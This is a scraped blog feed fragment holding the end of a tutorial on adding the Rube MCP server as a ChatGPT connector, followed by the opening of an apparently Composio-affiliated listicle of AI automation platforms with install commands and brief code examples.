&lt;p&gt;Head over to ChatGPT settings, then under &lt;strong&gt;Additional Settings&lt;/strong&gt; &amp;gt; &lt;strong&gt;Apps and Connectors&lt;/strong&gt;, make sure &lt;strong&gt;Developer mode is turned on&lt;/strong&gt;. This gives you access to add your own application.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fid84q1zuwebagt8bq2as.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fid84q1zuwebagt8bq2as.png" alt="ChatGPT Developer Mode"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Create&lt;/strong&gt;, and fill in the following details:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;MCP Server URL: The public URL you just got from Ngrok. Add &lt;code&gt;/mcp&lt;/code&gt; at the end, because that's the endpoint in our code that handles the requests from ChatGPT.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;For Name and Description, you can put anything you want (show your creativity!)&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Authentication: Select &lt;strong&gt;No Authentication&lt;/strong&gt;, as we'll handle authentication with Composio itself. Our app does not support OAuth by default.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv83tk9aqxk76vskyd046.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv83tk9aqxk76vskyd046.png" alt="ChatGPT Apps details"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  See It in Action
&lt;/h3&gt;

&lt;p&gt;Let's see how all of this adds up. Here's a quick demo to give you an idea of our application.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/hKjhxNT1_XM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Creating a Google Calendar meeting and viewing the details directly from GPT with widgets? That's really cool.&lt;/p&gt;
&lt;h2&gt;
  
  
  Advanced: How to use Rube MCP with the ChatGPT Apps SDK?
&lt;/h2&gt;

&lt;p&gt;You know what? If you don’t care about visual feedback or fancy widgets in ChatGPT, you don’t need to worry about any of that. This section is the right place to start.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 We only had to code all of that because I wanted to show you how to use Widgets with ChatGPT Apps + Rube MCP inside Next.js.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;None of the coding is necessary. The whole point of ChatGPT apps is to give you direct access to your applications right inside ChatGPT, so if you want all your apps ready to go without extra setup, this is perfect.&lt;/p&gt;

&lt;p&gt;Honestly, this is precisely what I’d recommend for your daily workflow. It’s simple, smooth, and gives you access to over 500 apps available on Rube. Pretty cool, right?&lt;/p&gt;

&lt;p&gt;Here’s all you need to do:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Make sure that you are in Developer Mode as we discussed earlier.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsfbunk56n1slcsvsj0az.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsfbunk56n1slcsvsj0az.png" alt="ChatGPT Developer Mode"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;In the same tab, click &lt;strong&gt;Create&lt;/strong&gt;, and fill in the following details:&lt;/li&gt;
&lt;li&gt;MCP Server URL: &lt;a href="https://rube.app/mcp" rel="noopener noreferrer"&gt;https://rube.app/mcp&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;For Name and Description, you can put anything you want (show your creativity!)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Make sure you set up OAuth authentication, as we'll be using it to access the tools in ChatGPT.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn9071v9md6dg2mcfuuvh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn9071v9md6dg2mcfuuvh.png" alt="ChatGPT New Connector Creation"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, click on &lt;strong&gt;Create&lt;/strong&gt;.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It will now ask for some access; hit &lt;strong&gt;Allow&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxwvzj0mfss2xb6myewee.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxwvzj0mfss2xb6myewee.png" alt="ChatGPT asking app access"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If everything goes well, your app should be available on ChatGPT. Make sure that you see all six actions listed, as these are the core actions Rube uses to manage authentication, prepare tool calls, and more.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk15813imh8410dwbu66d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk15813imh8410dwbu66d.png" alt="ChatGPT with Rube - Connection success"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here are all six Rube actions:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;RUBE_CREATE_PLAN&lt;/code&gt;: Creates a complete step-by-step plan for LLMs.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_MULTI_EXECUTE_TOOL&lt;/code&gt;: Fast and parallel tool executor for tools discovered through &lt;code&gt;RUBE_SEARCH_TOOLS&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_REMOTE_BASH_TOOL&lt;/code&gt;: Execute bash commands in a REMOTE sandbox for file operations, data processing, and system tasks.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_REMOTE_WORKBENCH&lt;/code&gt;: Process remote files or script bulk tool executions using Python code in a remote sandbox.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_SEARCH_TOOLS&lt;/code&gt;: Search for tools to execute the user task.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;RUBE_MANAGE_CONNECTIONS&lt;/code&gt;: Manage connection with Rube.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is to give you an idea of all the actions Rube will use to perform your tasks.&lt;/p&gt;

&lt;p&gt;And... that's it.&lt;/p&gt;

&lt;p&gt;Now, simply head over to your chat, use &lt;code&gt;@&amp;lt;APP_NAME&amp;gt;&lt;/code&gt;, in my case &lt;code&gt;@Rube MCP Server&lt;/code&gt;, and start talking.&lt;/p&gt;

&lt;p&gt;As an example, try saying this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"@ send an email to my ex at XYZ. Subject: Guess who. Body: Don’t worry, it’s just AI with Rube… or is it?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;(C’mon, try it, you’ll test two &lt;strong&gt;connections&lt;/strong&gt; at once. 😉 Just kidding…)&lt;/p&gt;


&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;Alright, now you’ve got a clear idea of how the ChatGPT Apps SDK works: how to set up a custom server powered by Composio, host it with Ngrok, and use it right inside ChatGPT, or plug in Rube and get going without any coding at all if you don't care about widgets.&lt;/p&gt;

&lt;p&gt;In this post, we walked through everything from building your own custom server with Rube and widget support in Next.js to skipping the code entirely if you want to move fast.&lt;/p&gt;

&lt;p&gt;Well, that's all for this! I will see you in the next one.&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>🔥Top 10 Make alternatives for building AI automation 🤖</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Mon, 06 Oct 2025 15:07:39 +0000</pubDate>
      <link>https://forem.com/composiodev/top-10-make-alternatives-for-building-ai-automation-1jgc</link>
      <guid>https://forem.com/composiodev/top-10-make-alternatives-for-building-ai-automation-1jgc</guid>
      <description>&lt;p&gt;This article lists the top 10 &lt;a href="https://make.com/" rel="noopener noreferrer"&gt;Make&lt;/a&gt; alternatives for building AI automation that you should definitely check out in 2025! 🔥&lt;/p&gt;

&lt;p&gt;If you're into AI automation, these tools are lifesavers. It doesn't matter whether you're a developer or not; I'll list tools for both &lt;strong&gt;developers&lt;/strong&gt; and &lt;strong&gt;non-developers&lt;/strong&gt;, so feel free to choose whatever suits you.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyilegd5oya3t4vrehuih.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyilegd5oya3t4vrehuih.gif" alt="Pick one from many"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want to see the list, here’s each of the tools worth checking out 👇&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;For Developers&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://composio.dev/" rel="noopener noreferrer"&gt;Composio&lt;/a&gt;: Connect your AI agent with 500+ apps and APIs using one SDK.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pipedream.com/" rel="noopener noreferrer"&gt;Pipedream&lt;/a&gt;: Deploy AI workflows in seconds with code-level control.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://merge.dev/" rel="noopener noreferrer"&gt;Merge&lt;/a&gt;: Unified API for syncing data and integrations across categories.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nango.dev/" rel="noopener noreferrer"&gt;Nango&lt;/a&gt;: Developer infra for managing 500+ API integrations.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://useparagon.com/" rel="noopener noreferrer"&gt;Paragon&lt;/a&gt;: Add prebuilt or custom integrations to your product fast.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;For Non-Developers&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://zapier.com/" rel="noopener noreferrer"&gt;Zapier&lt;/a&gt;: No-code automation with 8,000+ app connections.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://rube.app/" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;: Hosted MCP server that connects your AI tools to 500+ apps.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://n8n.io/" rel="noopener noreferrer"&gt;n8n&lt;/a&gt;: Open-source automation platform with full flexibility.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://langflow.org/" rel="noopener noreferrer"&gt;Langflow&lt;/a&gt;: Low-code AI builder for RAG and multi-agent apps.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://gumloop.com/" rel="noopener noreferrer"&gt;Gumloop&lt;/a&gt;: No-code platform to create AI workflows visually.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;Each tool serves a different purpose, so be sure to check each one to see which best fits your needs. ✌️&lt;/p&gt;




&lt;h2&gt;
  
  
  For Developers
&lt;/h2&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://composio.dev/" rel="noopener noreferrer"&gt;Composio&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Developer-first platform to connect AI agents with 500+ apps, APIs, and workflows.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F692q0a3rf28sbllleake.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F692q0a3rf28sbllleake.png" alt="Composio"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Composio is built for developers who want to connect their AI agents with 500+ apps, APIs, and workflows. It's a &lt;strong&gt;developer-first platform&lt;/strong&gt; that acts as a bridge, giving your agent access to hundreds of SaaS apps, APIs, and workflows out of the box.&lt;/p&gt;

&lt;p&gt;Composio handles everything from building integrations and managing authentication &lt;strong&gt;per integration&lt;/strong&gt; to optimizing JSON schemas for agents, all in one call.&lt;/p&gt;

&lt;p&gt;Instead of manually building connectors for integrations (Slack, Notion, you name it...), you drop in Composio's SDK or API, and your agent can start taking action right away.&lt;/p&gt;

&lt;p&gt;With Composio, you can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Add 100+ ready-to-use integrations into your AI agent instantly.&lt;/li&gt;
&lt;li&gt;Expose APIs and tools in a structured way for LLMs (Claude, GPT, Gemini, etc.) to consume.&lt;/li&gt;
&lt;li&gt;Deploy production-ready agents faster without reinventing the wheel.&lt;/li&gt;
&lt;li&gt;Extend workflows by mixing prebuilt connectors with your own custom logic.&lt;/li&gt;
&lt;li&gt;There's a lot...&lt;/li&gt;
&lt;/ul&gt;
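&lt;p&gt;To make the second bullet concrete, a “structured way for LLMs” usually means a JSON tool schema like the hand-written sketch below. The tool name and parameters are made up for illustration; in practice, Composio generates these schemas for you.&lt;/p&gt;

```python
import json

# A hand-written example of the kind of JSON tool schema an LLM consumes.
# The tool name and parameters here are hypothetical, purely for illustration.
tool = {
    "name": "SLACK_SEND_MESSAGE",
    "description": "Send a message to a Slack channel",
    "parameters": {
        "type": "object",
        "properties": {
            "channel": {"type": "string", "description": "Channel ID"},
            "text": {"type": "string", "description": "Message body"},
        },
        "required": ["channel", "text"],
    },
}

# An LLM with tool-calling support picks the tool by name and fills in the
# arguments; the platform then executes the real API call on its behalf.
print(tool["name"])  # SLACK_SEND_MESSAGE
```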

&lt;p&gt;In my experience, it's a &lt;strong&gt;must-have&lt;/strong&gt; and the &lt;strong&gt;most reliable&lt;/strong&gt; option if you're building agentic apps or automation products that need to talk to external services. Instead of wiring up OAuth, rate limits, and sync logic yourself, Composio handles all of that for you.&lt;/p&gt;

&lt;p&gt;Check out the &lt;a href="https://docs.composio.dev/docs/welcome" rel="noopener noreferrer"&gt;docs&lt;/a&gt; to get started, or jump straight in by installing their SDK in your project.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Quick Start:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install SDK (TypeScript)&lt;/span&gt;
npm &lt;span class="nb"&gt;install&lt;/span&gt; @composio/core

&lt;span class="c"&gt;# or (Python)&lt;/span&gt;
pip &lt;span class="nb"&gt;install &lt;/span&gt;composio
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Check out this demo to see Composio in action for Python. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/wkqlR8322F4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;For TypeScript, refer to this: &lt;a href="https://youtu.be/ZRGb4xGl-kc?si=xMxsXRDzDtYDG7p6" rel="noopener noreferrer"&gt;Getting Started with Composio using TypeScript&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 &lt;strong&gt;NOTE:&lt;/strong&gt; If you’re looking for something similar for non-developers, there’s Rube, which is part of Composio. I’ll cover it in the next section.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  2. &lt;a href="https://pipedream.com/" rel="noopener noreferrer"&gt;Pipedream&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Prompt, run, and deploy AI agents in seconds.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8919p34c7tugt3kam1om.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8919p34c7tugt3kam1om.png" alt="Pipedream"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pipedream gives you a visual workflow builder &lt;em&gt;and&lt;/em&gt; lets you drop into code when you want to. It’s built for developers who want speed without losing control.&lt;/p&gt;

&lt;p&gt;Here’s what makes Pipedream useful:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It supports &lt;strong&gt;2,800+ apps and APIs&lt;/strong&gt;, so you can link your AI agents to many tools quickly.&lt;/li&gt;
&lt;li&gt;You can write custom logic in &lt;strong&gt;Node.js, Python, Go, or Bash&lt;/strong&gt; inside workflows whenever you need flexibility.&lt;/li&gt;
&lt;li&gt;It handles OAuth, tokens, and integrations so you don’t have to reinvent those common parts.&lt;/li&gt;
&lt;li&gt;For AI-heavy tasks, Pipedream offers &lt;strong&gt;code generation from prompts&lt;/strong&gt;, making it easier to spin up agent logic.&lt;/li&gt;
&lt;/ul&gt;
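&lt;p&gt;To give you a feel for the custom-logic bullet, a Python code step is roughly a &lt;code&gt;handler&lt;/code&gt; function that receives the workflow context and returns data for later steps. The exact runtime object differs; the stand-in below only imitates its shape for illustration.&lt;/p&gt;

```python
from types import SimpleNamespace

def handler(pd):
    # Read the payload produced by the workflow's trigger step
    event = pd.steps["trigger"]["event"]
    # Custom logic: flag urgent subjects before passing data downstream
    return {
        "summary": f"Received: {event['subject']}",
        "urgent": "urgent" in event["subject"].lower(),
    }

# Simulate how the runtime would invoke the step (stand-in context object)
fake_pd = SimpleNamespace(
    steps={"trigger": {"event": {"subject": "URGENT: server down"}}}
)
result = handler(fake_pd)
print(result["urgent"])  # True
```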

&lt;p&gt;Check out this quick demo to see Pipedream in action. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/9Tan-MleeKQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  3. &lt;a href="https://merge.dev/" rel="noopener noreferrer"&gt;Merge&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Fast, secure integrations for your products and agents &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fld9748evh962dvm5dn5q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fld9748evh962dvm5dn5q.png" alt="Merge.dev"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Merge is all about simplifying integration. Instead of building connectors one by one, you use a &lt;strong&gt;single unified API&lt;/strong&gt;. Combine that with their MCP (Model Context Protocol) support, and your AI agent can read/write across many systems without you wiring each integration manually.&lt;/p&gt;

&lt;p&gt;Here’s how Merge helps you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It covers many categories like accounting, ticketing, CRM, file storage, and more with a common data model.&lt;/li&gt;
&lt;li&gt;You embed &lt;strong&gt;Merge Link&lt;/strong&gt; to let users link their accounts with apps you support. It handles auth, permissions, etc.&lt;/li&gt;
&lt;li&gt;The MCP server from Merge lets your AI agent treat all those integrations as “tools” it can call via MCP.&lt;/li&gt;
&lt;li&gt;Merge gives you SDKs, sandboxes, and developer tools to build faster without reinventing everything.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Want a quick video overview? Here you go: Merge’s CEO, Shensi Ding, explains how Merge helps. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/XdIvDqh0ro0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  4. &lt;a href="https://nango.dev/" rel="noopener noreferrer"&gt;Nango&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Developer infrastructure for product integrations with 500+ APIs.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce3jai3t8xwbrwvm72jr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce3jai3t8xwbrwvm72jr.png" alt="Nango"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nango is all about giving developers infrastructure so they don't have to build every connector from scratch. It provides tools and building blocks to manage auth, syncing, webhooks, and custom logic, all with full control over how data flows.&lt;/p&gt;

&lt;p&gt;I don't see much of an advantage to using Nango over the other tools I've mentioned, but it's worth giving it a shot.&lt;/p&gt;

&lt;p&gt;What Nango lets you do:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Ship integrations to 500+ APIs quickly with prebuilt templates, auth handling, rate-limit logic, and more.&lt;/li&gt;
&lt;li&gt;Write &lt;strong&gt;Functions&lt;/strong&gt; (TypeScript code) that run inside Nango for custom logic: data transformations, webhook handling, or special API quirks.&lt;/li&gt;
&lt;li&gt;Sync data both ways (read &amp;amp; write), manage webhooks, and handle complex API workflows.&lt;/li&gt;
&lt;li&gt;Self-host locally or use Nango’s cloud, with architecture built for reliability, observability, and scale.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here’s an intro video to Nango. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/pvUpbi04IjQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  5. &lt;a href="https://useparagon.com/" rel="noopener noreferrer"&gt;Paragon&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Ship every integration your customers need with 130+ pre-built connectors.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq8svo5o92t1tf28x7r1b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq8svo5o92t1tf28x7r1b.png" alt="Paragon"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Paragon is a tool that helps you add integrations to your product quickly. It comes with 130+ ready-made connectors, and you can also build your own custom ones on the same platform.&lt;/p&gt;

&lt;p&gt;Here’s what Paragon gives you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It handles authentication, token refresh, and API quirks so you don’t have to.&lt;/li&gt;
&lt;li&gt;You can use its &lt;strong&gt;Custom Integration Builder&lt;/strong&gt; to create new connectors in minutes when a prebuilt one doesn’t exist.&lt;/li&gt;
&lt;li&gt;It supports embedding the Connect UI (for users linking accounts) or going headless if you want full control.&lt;/li&gt;
&lt;li&gt;Your integration logic can run as workflows (with retries, debugging, concurrency) or in TypeScript for when custom code is needed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's a quick video intro to Paragon. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/eD2a7LlCjQM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  For Non-Developers
&lt;/h2&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://zapier.com/" rel="noopener noreferrer"&gt;Zapier&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The most connected no-code AI orchestration platform, integrating with 8,000+ apps.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqtfkdah0wsug8nced4js.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqtfkdah0wsug8nced4js.png" alt="Zapier"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Zapier is a veteran of the automation game, and now it’s fast evolving into an &lt;strong&gt;AI orchestration tool&lt;/strong&gt; too. You build workflows (called “Zaps”) that let actions in one app trigger responses in another (no coding needed, as you guessed 😉).&lt;/p&gt;

&lt;p&gt;With Zapier, you can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automate repetitive tasks across multiple apps (Slack, Gmail, CRMs, etc.)&lt;/li&gt;
&lt;li&gt;Use AI functions to route or act on data mid-workflow&lt;/li&gt;
&lt;li&gt;Build “Interfaces” (custom forms/UIs) that feed into Zaps&lt;/li&gt;
&lt;li&gt;Use “Tables” as lightweight databases for your workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And because Zapier supports thousands of apps, chances are the tools you already use are supported.&lt;/p&gt;
